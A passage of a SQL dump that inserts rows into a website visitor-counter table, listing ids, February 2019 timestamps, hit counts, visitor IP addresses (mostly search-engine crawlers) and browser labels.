0,0,'66.249.66.42','chrome'),(382415,1549402908,1,1,0,0,'40.77.167.69','other'),(382416,1549403237,1,1,0,0,'8.29.198.25','other'),(382417,1549403519,1,1,0,0,'46.229.168.149','other'),(382418,1549403665,1,1,0,0,'46.229.168.130','other'),(382419,1549404545,1,1,0,0,'46.229.168.139','other'),(382420,1549404657,1,1,0,0,'66.249.66.156','chrome'),(382421,1549404836,1,1,0,0,'216.244.66.241','other'),(382422,1549405046,2,2,0,0,'178.154.244.11','other'),(382423,1549405092,1,1,0,0,'66.249.66.44','chrome'),(382424,1549405367,1,1,0,0,'207.46.13.115','other'),(382425,1549405749,1,1,0,0,'66.249.66.42','chrome'),(382426,1549406212,1,1,0,0,'207.46.13.183','other'),(382427,1549407051,1,1,0,0,'46.229.168.148','other'),(382428,1549407305,1,1,0,0,'46.229.168.152','other'),(382429,1549407748,1,1,0,0,'216.244.66.241','other'),(382430,1549407834,1,1,0,0,'66.249.66.152','chrome'),(382431,1549408284,2,2,0,0,'207.46.13.115','other'),(382432,1549408804,1,1,0,0,'178.154.244.11','other'),(382433,1549409054,1,1,0,0,'46.229.168.152','other'),(382434,1549409289,1,1,0,0,'93.84.238.76','chrome'),(382435,1549409372,1,1,0,0,'66.249.66.152','chrome'),(382436,1549411433,3,3,0,0,'66.249.66.154','chrome'),(382437,1549411477,1,1,0,0,'66.249.66.42','chrome'),(382438,1549411779,1,1,0,0,'66.249.66.152','chrome'),(382439,1549412157,1,1,0,0,'8.29.198.27','other'),(382440,1549412288,1,1,0,0,'13.66.139.0','other'),(382441,1549413159,1,1,0,0,'66.249.66.44','chrome'),(382442,1549413535,1,1,0,0,'66.249.66.154','chrome'),(382443,1549413577,1,1,0,0,'141.8.142.103','other'),(382444,1549413892,1,1,0,0,'46.229.168.140','other'),(382445,1549414086,1,1,0,0,'8.29.198.25','other'),(382446,1549414260,1,1,0,0,'5.45.207.19','other'),(382447,1549414264,1,1,0,0,'5.45.207.79','other'),(382448,1549414315,1,1,0,0,'46.229.168.133','other'),(382449,1549414508,1,1,0,0,'192.42.116.22','other'),(382450,1549414648,2,2,0,0,'66.249.66.154','chrome'),(382451,1549414727,1,1,0,0,'40.77.167.1','other'),(382452,1549415352,1,1,0,0,'66.249.66.42','chrome'),(382453,1549415361,1,1,0,0,'66.249.66.152','chrome'),(382454,1549415794,1,1,0,0,'40.77.167.1','other'),(382455,1549416289,1,1,0,0,'66.249.66.42','chrome'),(382456,1549416364,1,1,0,0,'66.249.66.44','chrome'),(382457,1549416370,1,1,0,0,'216.244.66.241','other'),(382458,1549416471,1,1,0,0,'46.229.168.133','other'),(382459,1549416540,1,1,0,0,'66.249.66.154','chrome'),(382460,1549416651,2,2,0,0,'5.45.207.19','other'),(382461,1549416701,1,1,0,0,'46.229.168.146','other'),(382462,1549416941,2,2,0,0,'66.249.66.156','chrome'),(382463,1549416965,1,1,0,0,'66.249.66.40','chrome'),(382464,1549417173,16,16,0,0,'88.208.252.212','other'),(382465,1549417265,1,1,0,0,'40.77.167.37','other'),(382466,1549417304,6,6,0,0,'5.45.207.79','other'),(382467,1549417329,1,1,0,0,'66.249.66.152','chrome'),(382468,1549417343,5,5,0,0,'141.8.142.103','other'),(382469,1549417351,3,3,0,0,'95.108.213.4','other'),(382470,1549417575,1,1,0,0,'178.154.244.49','other'),(382471,1549417665,2,2,0,0,'37.9.113.20','other'),(382472,1549417725,1,1,0,0,'178.154.244.11','other'),(382473,1549417810,1,1,0,0,'207.46.13.154','other'),(382474,1549417835,1,1,0,0,'216.244.66.241','other'),(382475,1549418072,1,1,0,0,'141.8.142.38','other'),(382476,1549418122,2,2,0,0,'87.250.224.65','other'),(382477,1549418176,1,1,0,0,'178.154.171.27','other'),(382478,1549418183,1,1,0,0,'209.17.97.34','other'),(382479,1549418649,2,2,0,0,'66.249.66.156','chrome'),(382480,1549419158,2,2,0,0,'37.9.113.20','other'),(382481,1549419162,2,2,0,0,'178.154.200.48','other'),(382482,1549419163,1,1,0,0,'141.8.142.144','other'),(382483,1549419165,3,3,0,0,'95.108.213.4','other'),(382484,1549419176,1,1,0,0,'213.180.203.40','other'),(382485,1549419177,1,1,0,0,'141.8.132.16','other'),(382486,1549419179,1,1,0,0,'141.8.183.22','other'),(382487,1549419184,2,2,0,0,'141.8.142.108','other'),(382488,1549419185,3,3,0,0,'87.250.224.65','other'),(382489,1549419264,1,1,0,0,'178.154.244.49','other'),(382490,1549419331,2,2,0,0,'178.154.244.11','other'),(382491,1549419361,1,1,0,0,'141.8.142.103','other'),(382492,1549419375,2,2,0,0,'52.36.29.142','chrome'),(382493,1549419419,1,1,0,0,'178.154.244.65','other'),(382494,1549419571,1,1,0,0,'5.45.207.79','other'),(382495,1549419575,1,1,0,0,'66.249.66.154','chrome'),(382496,1549419656,1,1,0,0,'5.45.207.19','other'),(382497,1549419794,1,1,0,0,'46.229.168.143','other'),(382498,1549420042,1,1,0,0,'66.249.66.156','chrome'),(382499,1549420581,1,1,0,0,'46.229.168.133','other'),(382500,1549420800,1,1,0,0,'46.229.168.148','other'),(382501,1549421665,1,1,0,0,'207.46.13.104','other'),(382502,1549421922,1,1,0,0,'66.249.66.154','chrome'),(382503,1549422241,1,1,0,0,'46.229.168.141','other'),(382504,1549422249,3,3,0,0,'66.249.66.156','chrome'),(382505,1549422738,2,2,0,0,'66.249.66.152','chrome'),(382506,1549422793,1,1,0,0,'207.46.13.104','other'),(382507,1549423018,1,1,0,0,'8.29.198.25','other'),(382508,1549423045,2,2,0,0,'178.154.244.11','other'),(382509,1549423675,1,1,0,0,'66.249.66.152','chrome'),(382510,1549424508,1,1,0,0,'216.244.66.241','other'),(382511,1549424914,1,1,0,0,'46.229.168.144','other'),(382512,1549424938,1,1,0,0,'8.29.198.25','other'),(382513,1549425416,1,1,0,0,'46.229.168.143','other'),(382514,1549426163,1,1,0,0,'207.46.13.147','other'),(382515,1549426175,1,1,0,0,'207.46.13.46','other'),(382516,1549426464,1,1,0,0,'40.77.167.61','other'),(382517,1549426627,1,1,0,0,'40.77.167.90','other'),(382518,1549426648,2,2,0,0,'43.240.28.57','chrome'),(382519,1549426866,2,2,0,0,'216.244.66.241','other'),(382520,1549426942,1,1,0,0,'46.229.168.151','other'),(382521,1549427229,2,2,0,0,'207.46.13.104','other'),(382522,1549427280,1,1,0,0,'66.249.66.154','chrome'),(382523,1549428775,1,1,0,0,'207.46.13.104','other'),(382524,1549428798,7,7,0,0,'178.154.244.11','other'),(382525,1549428995,1,1,0,0,'66.249.66.156','chrome'),(382526,1549429034,9,9,0,0,'5.45.207.79','other'),(382527,1549429045,5,5,0,0,'5.45.207.19','other'),(382528,1549429420,2,2,0,0,'141.8.142.103','other'),(382529,1549429479,2,2,0,0,'95.108.213.4','other'),(382530,1549429795,2,2,0,0,'37.9.113.148','other'),(382531,1549429813,4,4,0,0,'178.154.244.11','other'),(382532,1549429846,1,1,0,0,'87.250.224.65','other'),(382533,1549429873,1,1,0,0,'141.8.142.108','other'),(382534,1549430013,1,1,0,0,'5.45.207.79','other'),(382535,1549430169,1,1,0,0,'46.229.168.138','other'),(382536,1549430733,1,1,0,0,'66.249.66.42','chrome'),(382537,1549430757,1,1,0,0,'207.46.13.104','other'),(382538,1549430840,1,1,0,0,'40.77.167.87','other'),(382539,1549431032,1,1,0,0,'46.229.168.143','other'),(382540,1549431693,1,1,0,0,'46.229.168.132','other'),(382541,1549432465,1,1,0,0,'66.249.66.154','chrome'),(382542,1549432586,1,1,0,0,'46.229.168.150','other'),(382543,1549432612,1,1,0,0,'46.229.168.151','other'),(382544,1549432714,7,7,0,0,'173.208.130.202','other'),(382545,1549432814,1,1,0,0,'46.229.168.137','other'),(382546,1549432934,1,1,0,0,'46.229.168.144','other'),(382547,1549433022,2,2,0,0,'66.249.66.156','chrome'),(382548,1549433190,2,2,0,0,'66.249.66.40','chrome'),(382549,1549433393,1,1,0,0,'144.76.38.40','other'),(382550,1549433466,1,1,0,0,'109.70.100.20','other'),(382551,1549433647,1,1,0,0,'207.46.13.104','other'),(382552,1549433690,1,1,0,0,'91.196.178.133','firefox'),(382553,1549433871,1,1,0,0,'8.29.198.25','other'),(382554,1549434020,2,2,0,0,'66.249.66.152','chrome'),(382555,1549434162,1,1,0,0,'46.211.72.17','chrome'),(382556,1549434957,1,1,0,0,'66.249.66.154','chrome'),(382557,1549435017,1,1,0,0,'178.92.159.81','chrome'),(382558,1549435281,1,1,0,0,'40.77.167.29','other'),(382559,1549435786,1,1,0,0,'8.29.198.25','other'),(382560,1549435960,1,1,0,0,'89.163.242.241','opera'),(382561,1549435962,2,2,0,0,'207.46.13.104','other'),(382562,1549436228,1,1,0,0,'46.229.168.148','other'),(382563,1549436346,1,1,0,0,'91.196.178.85','firefox'),(382564,1549436421,3,3,0,0,'66.249.66.152','chrome'),(382565,1549436738,1,1,0,0,'46.229.168.130','other'),(382566,1549436877,1,1,0,0,'66.249.66.156','chrome'),(382567,1549436881,1,1,0,0,'66.249.66.40','chrome'),(382568,1549436996,1,1,0,0,'91.196.178.67','chrome'),(382569,1549437124,1,1,0,0,'87.250.224.81','other'),(382570,1549437430,1,1,0,0,'46.229.168.132','other'),(382571,1549437509,1,1,0,0,'180.76.15.146','other'),(382572,1549438376,1,1,0,0,'162.210.196.130','other'),(382573,1549438529,1,1,0,0,'66.249.66.156','chrome'),(382574,1549438849,1,1,0,0,'188.0.78.83','chrome'),(382575,1549440153,2,2,0,0,'66.249.66.42','chrome'),(382576,1549440517,1,1,0,0,'66.249.66.40','chrome'),(382577,1549440636,1,1,0,0,'66.249.66.218','chrome'),(382578,1549440743,1,1,0,0,'216.244.66.241','other'),(382579,1549441229,2,2,0,0,'66.249.66.154','chrome'),(382580,1549441479,1,1,0,0,'5.45.207.79','other'),(382581,1549441558,1,1,0,0,'91.196.178.70','chrome'),(382582,1549441913,1,1,0,0,'66.249.66.218','chrome'),(382583,1549442013,1,1,0,0,'66.249.66.152','chrome'),(382584,1549442160,1,1,0,0,'66.249.66.44','chrome'),(382585,1549442783,1,1,0,0,'54.36.149.65','other'),(382586,1549442803,1,1,0,0,'157.55.39.171','other'),(382587,1549442872,3,3,0,0,'207.46.13.104','other'),(382588,1549443060,1,1,0,0,'54.36.149.34','other'),(382589,1549443294,1,1,0,0,'54.36.148.185','other'),(382590,1549443413,1,1,0,0,'82.207.49.106','chrome'),(382591,1549443605,1,1,0,0,'216.244.66.241','other'),(382592,1549443779,1,1,0,0,'54.36.148.143','other'),(382593,1549443875,1,1,0,0,'91.196.178.67','chrome'),(382594,1549444003,1,1,0,0,'157.55.39.171','other'),(382595,1549444040,1,1,0,0,'130.180.218.64','chrome'),(382596,1549444297,1,1,0,0,'40.77.167.95','other'),(382597,1549444411,1,1,0,0,'83.142.233.83','chrome'),(382598,1549444746,1,1,0,0,'8.29.198.25','other'),(382599,1549444760,1,1,0,0,'66.249.66.44','chrome'),(382600,1549444889,1,1,0,0,'46.229.168.137','other'),(382601,1549444965,1,1,0,0,'195.22.108.124','firefox'),(382602,1549445050,1,1,0,0,'66.249.66.156','chrome'),(382603,1549445101,1,1,0,0,'91.196.178.69','chrome'),(382604,1549445212,1,1,0,0,'37.54.219.124','chrome'),(382605,1549445462,1,1,0,0,'66.249.66.40','chrome'),(382606,1549445580,1,1,0,0,'91.196.177.15','chrome'),(382607,1549445758,1,1,0,0,'66.249.66.154','chrome'),(382608,1549446032,1,1,0,0,'54.36.148.133','other'),(382609,1549446040,1,1,0,0,'180.76.15.19','other'),(382610,1549446078,1,1,0,0,'54.36.148.215','other'),(382611,1549446439,1,1,0,0,'91.209.55.69','chrome'),(382612,1549446625,1,1,0,0,'8.29.198.26','other'),(382613,1549446836,1,1,0,0,'91.196.178.163','chrome'),(382614,1549446875,1,1,0,0,'178.54.190.249','chrome'),(382615,1549447108,1,1,0,0,'54.36.148.71','other'),(382616,1549447484,1,1,0,0,'91.196.178.67','chrome'),(382617,1549447554,1,1,0,0,'54.36.148.224','other'),(382618,1549447691,2,2,0,0,'95.213.141.126','opera'),(382619,1549447829,1,1,0,0,'54.36.149.88','other'),(382620,1549447994,1,1,0,0,'95.132.5.232','firefox'),(382621,1549448000,1,1,0,0,'66.249.66.152','chrome'),(382622,1549448164,1,1,0,0,'54.36.148.228','other'),(382623,1549448377,1,1,0,0,'66.249.66.154','chrome'),(382624,1549448538,1,1,0,0,'46.229.168.130','other'),(382625,1549448618,1,1,0,0,'178.154.244.11','other'),(382626,1549448705,1,1,0,0,'37.53.123.48','chrome'),(382627,1549448744,1,1,0,0,'54.36.148.31','other'),(382628,1549448760,2,2,0,0,'216.244.66.241','other'),(382629,1549448812,1,1,0,0,'54.36.148.187','other'),(382630,1549448932,1,1,0,0,'54.36.149.35','other'),(382631,1549449117,1,1,0,0,'54.36.149.97','other'),(382632,1549449171,1,1,0,0,'5.45.207.79','other'),(382633,1549449234,1,1,0,0,'141.8.142.103','other'),(382634,1549449530,1,1,0,0,'178.92.159.81','chrome'),(382635,1549449768,1,1,0,0,'178.92.138.239','chrome'),(382636,1549449834,1,1,0,0,'66.249.66.152','chrome'),(382637,1549449918,1,1,0,0,'54.36.148.155','other'),(382638,1549450537,1,1,0,0,'5.45.207.19','other'),(382639,1549450541,1,1,0,0,'66.249.66.154','chrome'),(382640,1549450789,1,1,0,0,'157.55.39.152','other'),(382641,1549451100,1,1,0,0,'66.249.66.152','chrome'),(382642,1549451224,1,1,0,0,'66.249.66.44','chrome'),(382643,1549451265,3,3,0,0,'157.55.39.159','other'),(382644,1549451479,1,1,0,0,'54.36.148.51','other'),(382645,1549451595,1,1,0,0,'54.36.149.96','other'),(382646,1549451732,1,1,0,0,'141.8.142.103','other'),(382647,1549451762,1,1,0,0,'46.229.168.142','other'),(382648,1549451816,1,1,0,0,'13.66.139.0','other'),(382649,1549451852,1,1,0,0,'91.196.178.170','chrome'),(382650,1549451971,1,1,0,0,'37.53.123.48','chrome'),(382651,1549451979,1,1,0,0,'66.249.66.40','chrome'),(382652,1549452295,1,1,0,0,'46.229.168.143','other'),(382653,1549452354,1,1,0,0,'54.36.149.29','other'),(382654,1549452441,1,1,0,0,'66.249.66.42','chrome'),(382655,1549452488,1,1,0,0,'157.55.39.159','other'),(382656,1549452652,4,4,0,0,'5.45.207.79','other'),(382657,1549452876,1,1,0,0,'40.77.167.134','other'),(382658,1549452978,1,1,0,0,'54.36.148.243','other'),(382659,1549453153,4,4,0,0,'141.8.142.103','other'),(382660,1549453600,7,7,0,0,'178.154.244.11','other'),(382661,1549453674,1,1,0,0,'54.36.148.233','other'),(382662,1549453682,1,1,0,0,'188.0.78.83','chrome'),(382663,1549453810,3,3,0,0,'5.45.207.79','other'),(382664,1549453953,3,3,0,0,'5.45.207.19','other'),(382665,1549454156,1,1,0,0,'46.229.168.144','other'),(382666,1549454464,2,2,0,0,'66.249.66.152','chrome'),(382667,1549454570,1,1,0,0,'54.36.148.242','other'),(382668,1549454575,2,2,0,0,'91.196.177.15','chrome'),(382669,1549454747,1,1,0,0,'5.45.207.79','other'),(382670,1549454820,1,1,0,0,'54.36.149.91','other'),(382671,1549455112,3,3,0,0,'178.154.244.11','other'),(382672,1549455407,1,1,0,0,'5.45.207.19','other'),(382673,1549455606,1,1,0,0,'8.29.198.27','other'),(382674,1549455663,1,1,0,0,'46.229.168.153','other'),(382675,1549456340,1,1,0,0,'40.77.167.134','other'),(382676,1549456544,1,1,0,0,'91.196.178.130','firefox'),(382677,1549456586,2,2,0,0,'66.249.66.156','chrome'),(382678,1549456771,2,2,0,0,'66.249.66.154','chrome'),(382679,1549456971,1,1,0,0,'91.195.156.90','firefox'),(382680,1549456997,1,1,0,0,'91.124.182.170','firefox'),(382681,1549457011,2,2,0,0,'216.244.66.241','other'),(382682,1549457053,1,1,0,0,'54.36.148.137','other'),(382683,1549457154,1,1,0,0,'54.36.148.67','other'),(382684,1549457174,2,2,0,0,'95.132.5.232','firefox'),(382685,1549457198,1,1,0,0,'91.196.177.46','firefox'),(382686,1549457213,1,1,0,0,'91.196.178.67','chrome'),(382687,1549457286,1,1,0,0,'54.36.148.23','other'),(382688,1549457463,1,1,0,0,'8.29.198.27','other'),(382689,1549457474,1,1,0,0,'37.55.58.157','firefox'),(382690,1549457595,1,1,0,0,'54.36.148.136','other'),(382691,1549457622,1,1,0,0,'66.249.66.42','chrome'),(382692,1549457634,1,1,0,0,'40.77.167.134','other'),(382693,1549458292,1,1,0,0,'157.55.39.159','other'),(382694,1549458297,1,1,0,0,'82.207.49.106','chrome'),(382695,1549458337,1,1,0,0,'95.132.5.232','firefox'),(382696,1549458525,1,1,0,0,'66.249.66.42','chrome'),(382697,1549458838,1,1,0,0,'178.62.208.24','chrome'),(382698,1549458841,1,1,0,0,'66.249.66.154','chrome'),(382699,1549458963,1,1,0,0,'54.36.148.106','other'),(382700,1549459247,11,11,0,0,'23.237.4.26','other');
INSERT INTO `fw3gt_zt_visitor_counter` VALUES (382701,1549459364,1,1,0,0,'54.36.148.40','other'),(382702,1549459606,1,1,0,0,'91.196.178.73','chrome'),(382703,1549459816,1,1,0,0,'157.55.39.152','other'),(382704,1549459952,5,5,0,0,'216.244.66.241','other'),(382705,1549460086,1,1,0,0,'54.36.148.149','other'),(382706,1549460088,1,1,0,0,'95.215.94.94','chrome'),(382707,1549460167,1,1,0,0,'54.36.148.145','other'),(382708,1549460340,1,1,0,0,'54.36.148.163','other'),(382709,1549460352,1,1,0,0,'37.9.113.103','other'),(382710,1549460738,1,1,0,0,'91.196.178.67','chrome'),(382711,1549461358,1,1,0,0,'54.36.148.202','other'),(382712,1549461440,1,1,0,0,'178.92.159.81','chrome'),(382713,1549461554,1,1,0,0,'66.249.66.42','chrome'),(382714,1549461855,1,1,0,0,'46.229.168.146','other'),(382715,1549461904,1,1,0,0,'51.255.65.46','other'),(382716,1549462026,2,2,0,0,'66.249.66.40','chrome'),(382717,1549462209,2,2,0,0,'66.249.66.44','chrome'),(382718,1549462283,1,1,0,0,'40.77.167.137','other'),(382719,1549462551,1,1,0,0,'91.195.156.90','firefox'),(382720,1549463091,1,1,0,0,'54.36.148.101','other'),(382721,1549463103,1,1,0,0,'66.249.66.156','chrome'),(382722,1549463446,1,1,0,0,'66.249.66.44','chrome'),(382723,1549463660,1,1,0,0,'54.36.148.74','other'),(382724,1549463795,2,2,0,0,'66.249.66.152','chrome'),(382725,1549464120,1,1,0,0,'54.36.148.12','other'),(382726,1549464177,1,1,0,0,'54.36.148.127','other'),(382727,1549464188,1,1,0,0,'54.36.148.188','other'),(382728,1549464235,1,1,0,0,'94.178.130.22','chrome'),(382729,1549464449,1,1,0,0,'54.36.149.44','other'),(382730,1549464472,1,1,0,0,'40.77.167.137','other'),(382731,1549464597,1,1,0,0,'54.36.148.108','other'),(382732,1549464756,1,1,0,0,'66.249.66.152','chrome'),(382733,1549464801,1,1,0,0,'54.36.148.45','other'),(382734,1549464838,7,7,0,0,'51.15.21.191','other'),(382735,1549464843,1,1,0,0,'89.163.242.241','opera'),(382736,1549464851,1,1,0,0,'77.37.243.189','chrome'),(382737,1549464886,1,1,0,0,'91.196.178.67','chrome'),(382738,1549464961,1,1,0,0,'54.36.148.71','other'),(382739,1549464975,1,1,0,0,'66.249.66.154','chrome'),(382740,1549464991,1,1,0,0,'54.36.149.24','other'),(382741,1549465051,1,1,0,0,'54.36.148.119','other'),(382742,1549465228,1,1,0,0,'216.244.66.241','other'),(382743,1549465570,1,1,0,0,'54.36.149.41','other'),(382744,1549465706,1,1,0,0,'207.46.13.158','other'),(382745,1549465751,1,1,0,0,'54.36.148.253','other'),(382746,1549465819,1,1,0,0,'178.92.171.220','chrome'),(382747,1549465888,1,1,0,0,'66.249.66.156','chrome'),(382748,1549466010,1,1,0,0,'54.36.148.216','other'),(382749,1549466246,1,1,0,0,'54.36.148.233','other'),(382750,1549466376,1,1,0,0,'23.103.64.39','other'),(382751,1549466456,1,1,0,0,'54.36.148.207','other'),(382752,1549466461,1,1,0,0,'8.29.198.26','other'),(382753,1549466551,1,1,0,0,'207.46.13.236','other'),(382754,1549466924,1,1,0,0,'40.77.167.177','other'),(382755,1549467024,1,1,0,0,'54.36.149.68','other'),(382756,1549467168,1,1,0,0,'54.36.148.54','other'),(382757,1549467290,2,2,0,0,'216.244.66.241','other'),(382758,1549467697,1,1,0,0,'54.36.149.43','other'),(382759,1549467733,1,1,0,0,'66.249.66.152','chrome'),(382760,1549468232,1,1,0,0,'207.46.13.158','other'),(382761,1549468297,1,1,0,0,'46.229.168.130','other'),(382762,1549468309,1,1,0,0,'8.29.198.26','other'),(382763,1549468460,1,1,0,0,'46.229.168.138','other'),(382764,1549468496,1,1,0,0,'54.36.148.43','other'),(382765,1549468543,1,1,0,0,'40.77.167.60','other'),(382766,1549468566,1,1,0,0,'54.36.149.52','other'),(382767,1549468972,1,1,0,0,'66.249.66.152','chrome'),(382768,1549469197,1,1,0,0,'66.249.66.156','chrome'),(382769,1549469379,1,1,0,0,'176.102.196.148','chrome'),(382770,1549469393,1,1,0,0,'54.36.148.22','other'),(382771,1549469462,1,1,0,0,'46.229.168.136','other'),(382772,1549469602,1,1,0,0,'207.46.13.198','other'),(382773,1549469699,1,1,0,0,'54.36.148.162','other'),(382774,1549469841,1,1,0,0,'54.36.148.60','other'),(382775,1549470060,1,1,0,0,'46.229.168.146','other'),(382776,1549470076,1,1,0,0,'54.36.148.67','other'),(382777,1549470198,1,1,0,0,'54.36.148.144','other'),(382778,1549470417,1,1,0,0,'216.244.66.241','other'),(382779,1549470998,1,1,0,0,'46.229.168.129','other'),(382780,1549471343,2,2,0,0,'66.249.66.152','chrome'),(382781,1549471840,1,1,0,0,'54.36.149.28','other'),(382782,1549471960,1,1,0,0,'66.249.66.154','chrome'),(382783,1549471996,1,1,0,0,'40.77.167.60','other'),(382784,1549472125,1,1,0,0,'46.229.168.144','other'),(382785,1549472333,2,2,0,0,'216.244.66.241','other'),(382786,1549473996,1,1,0,0,'46.211.128.239','chrome'),(382787,1549474153,2,2,0,0,'198.27.66.169','chrome'),(382788,1549474770,1,1,0,0,'54.36.148.251','other'),(382789,1549474949,1,1,0,0,'216.244.66.241','other'),(382790,1549474958,2,2,0,0,'66.249.66.156','chrome'),(382791,1549475039,1,1,0,0,'66.249.66.152','chrome'),(382792,1549475106,1,1,0,0,'66.249.66.42','chrome'),(382793,1549475253,1,1,0,0,'54.36.148.128','other'),(382794,1549475395,1,1,0,0,'46.229.168.129','other'),(382795,1549475400,1,1,0,0,'54.36.149.39','other'),(382796,1549475583,1,1,0,0,'54.36.149.101','other'),(382797,1549475692,1,1,0,0,'54.36.148.73','other'),(382798,1549475775,1,1,0,0,'54.36.148.203','other'),(382799,1549475884,1,1,0,0,'66.249.66.40','chrome'),(382800,1549475946,1,1,0,0,'207.46.13.146','other'),(382801,1549476306,1,1,0,0,'46.229.168.153','other'),(382802,1549476354,1,1,0,0,'66.249.66.152','chrome'),(382803,1549476453,1,1,0,0,'66.249.66.44','chrome'),(382804,1549476464,1,1,0,0,'91.196.178.162','chrome'),(382805,1549476899,1,1,0,0,'66.249.66.144','chrome'),(382806,1549477013,1,1,0,0,'54.36.149.49','other'),(382807,1549477146,1,1,0,0,'207.46.13.198','other'),(382808,1549477269,1,1,0,0,'91.196.178.61','chrome'),(382809,1549477325,1,1,0,0,'8.29.198.27','other'),(382810,1549477379,1,1,0,0,'141.8.142.108','other'),(382811,1549477568,1,1,0,0,'66.249.66.40','chrome'),(382812,1549477717,1,1,0,0,'54.36.149.37','other'),(382813,1549477855,1,1,0,0,'54.36.149.33','other'),(382814,1549477983,1,1,0,0,'5.45.207.19','other'),(382815,1549478201,1,1,0,0,'54.36.148.184','other'),(382816,1549478316,1,1,0,0,'46.229.168.134','other'),(382817,1549478369,1,1,0,0,'87.250.224.65','other'),(382818,1549478471,1,1,0,0,'66.249.66.42','chrome'),(382819,1549478662,1,1,0,0,'46.229.168.151','other'),(382820,1549479148,1,1,0,0,'8.29.198.25','other'),(382821,1549479178,1,1,0,0,'54.36.148.144','other'),(382822,1549479345,1,1,0,0,'66.249.66.152','chrome'),(382823,1549479349,1,1,0,0,'207.46.13.164','other'),(382824,1549479653,1,1,0,0,'158.69.52.114','chrome'),(382825,1549479716,1,1,0,0,'207.46.13.158','other'),(382826,1549479999,1,1,0,0,'54.36.148.237','other'),(382827,1549480156,2,2,0,0,'216.244.66.241','other'),(382828,1549480417,1,1,0,0,'54.36.149.71','other'),(382829,1549480551,1,1,0,0,'54.36.148.150','other'),(382830,1549480670,1,1,0,0,'66.249.66.40','chrome'),(382831,1549480989,1,1,0,0,'66.249.66.156','chrome'),(382832,1549481382,1,1,0,0,'216.244.66.241','other'),(382833,1549481406,1,1,0,0,'54.36.148.205','other'),(382834,1549481642,1,1,0,0,'46.229.168.147','other'),(382835,1549481728,1,1,0,0,'54.36.148.207','other'),(382836,1549482485,1,1,0,0,'54.36.149.0','other'),(382837,1549482579,1,1,0,0,'66.249.66.154','chrome'),(382838,1549482608,1,1,0,0,'66.249.66.44','chrome'),(382839,1549482694,1,1,0,0,'54.36.148.117','other'),(382840,1549482831,1,1,0,0,'157.55.39.209','other'),(382841,1549483381,2,2,0,0,'207.46.13.146','other'),(382842,1549483478,1,1,0,0,'66.249.66.146','chrome'),(382843,1549483584,2,2,0,0,'216.244.66.241','other'),(382844,1549483898,1,1,0,0,'54.36.148.197','other'),(382845,1549484240,1,1,0,0,'54.36.148.40','other'),(382846,1549484294,1,1,0,0,'54.36.149.42','other'),(382847,1549484472,1,1,0,0,'46.229.168.136','other'),(382848,1549484780,1,1,0,0,'66.249.66.154','chrome'),(382849,1549484847,1,1,0,0,'54.36.148.154','other'),(382850,1549484905,1,1,0,0,'46.229.168.130','other'),(382851,1549485137,1,1,0,0,'54.36.148.210','other'),(382852,1549485386,1,1,0,0,'66.249.66.156','chrome'),(382853,1549485493,1,1,0,0,'54.36.148.79','other'),(382854,1549485562,1,1,0,0,'54.36.149.16','other'),(382855,1549485758,1,1,0,0,'54.36.148.78','other'),(382856,1549485879,1,1,0,0,'54.36.148.84','other'),(382857,1549486015,1,1,0,0,'54.36.149.81','other'),(382858,1549486293,1,1,0,0,'66.249.66.42','chrome'),(382859,1549486326,1,1,0,0,'66.249.66.148','chrome'),(382860,1549486348,1,1,0,0,'54.36.149.69','other'),(382861,1549486350,1,1,0,0,'54.36.148.92','other'),(382862,1549486484,4,4,0,0,'216.244.66.241','other'),(382863,1549486807,1,1,0,0,'90.188.255.142','chrome'),(382864,1549486831,1,1,0,0,'66.249.66.156','chrome'),(382865,1549487239,1,1,0,0,'66.249.66.42','chrome'),(382866,1549487314,1,1,0,0,'54.36.148.171','other'),(382867,1549487481,1,1,0,0,'54.36.149.106','other'),(382868,1549487605,1,1,0,0,'54.36.149.52','other'),(382869,1549487625,1,1,0,0,'66.249.66.154','chrome'),(382870,1549487878,1,1,0,0,'54.36.148.131','other'),(382871,1549488162,1,1,0,0,'54.36.148.158','other'),(382872,1549488172,1,1,0,0,'8.29.198.26','other'),(382873,1549488501,1,1,0,0,'66.249.66.156','chrome'),(382874,1549488547,1,1,0,0,'54.36.149.50','other'),(382875,1549488573,1,1,0,0,'66.249.66.44','chrome'),(382876,1549488821,1,1,0,0,'54.36.149.27','other'),(382877,1549488866,1,1,0,0,'216.244.66.241','other'),(382878,1549489100,1,1,0,0,'54.36.148.72','other'),(382879,1549489113,1,1,0,0,'66.249.66.154','chrome'),(382880,1549489222,1,1,0,0,'66.249.66.144','chrome'),(382881,1549489461,1,1,0,0,'54.36.148.103','other'),(382882,1549489618,1,1,0,0,'46.229.168.132','other'),(382883,1549489763,1,1,0,0,'66.249.66.44','chrome'),(382884,1549489849,1,1,0,0,'54.36.148.246','other'),(382885,1549489981,1,1,0,0,'8.29.198.27','other'),(382886,1549490633,1,1,0,0,'46.229.168.152','other'),(382887,1549490829,1,1,0,0,'54.36.148.58','other'),(382888,1549490941,1,1,0,0,'66.249.66.40','chrome'),(382889,1549491184,1,1,0,0,'66.249.66.154','chrome'),(382890,1549491307,1,1,0,0,'54.36.149.59','other'),(382891,1549491904,1,1,0,0,'54.36.148.113','other'),(382892,1549491931,1,1,0,0,'54.36.148.188','other'),(382893,1549491946,1,1,0,0,'46.229.168.132','other'),(382894,1549493039,1,1,0,0,'54.36.148.11','other'),(382895,1549493081,1,1,0,0,'54.36.149.17','other'),(382896,1549493415,1,1,0,0,'46.229.168.139','other'),(382897,1549493458,1,1,0,0,'66.249.66.42','chrome'),(382898,1549493566,1,1,0,0,'54.36.148.174','other'),(382899,1549493828,1,1,0,0,'54.36.148.226','other'),(382900,1549494157,1,1,0,0,'54.36.148.149','other'),(382901,1549494242,1,1,0,0,'54.36.148.204','other'),(382902,1549494812,2,2,0,0,'54.36.148.131','other'),(382903,1549495130,1,1,0,0,'80.248.227.208','other'),(382904,1549495179,1,1,0,0,'54.36.148.85','other'),(382905,1549495204,1,1,0,0,'54.36.148.154','other'),(382906,1549495222,1,1,0,0,'54.36.148.23','other'),(382907,1549495374,1,1,0,0,'207.46.13.164','other'),(382908,1549495405,1,1,0,0,'54.36.148.78','other'),(382909,1549495423,2,2,0,0,'66.249.66.156','chrome'),(382910,1549495692,1,1,0,0,'157.55.39.209','other'),(382911,1549495826,1,1,0,0,'66.249.66.152','chrome'),(382912,1549495980,1,1,0,0,'52.53.201.78','chrome'),(382913,1549496154,1,1,0,0,'54.36.148.227','other'),(382914,1549496181,2,2,0,0,'54.36.148.129','other'),(382915,1549496281,1,1,0,0,'54.36.149.84','other'),(382916,1549496709,1,1,0,0,'54.36.149.14','other'),(382917,1549497090,1,1,0,0,'54.36.148.147','other'),(382918,1549497147,2,2,0,0,'216.244.66.241','other'),(382919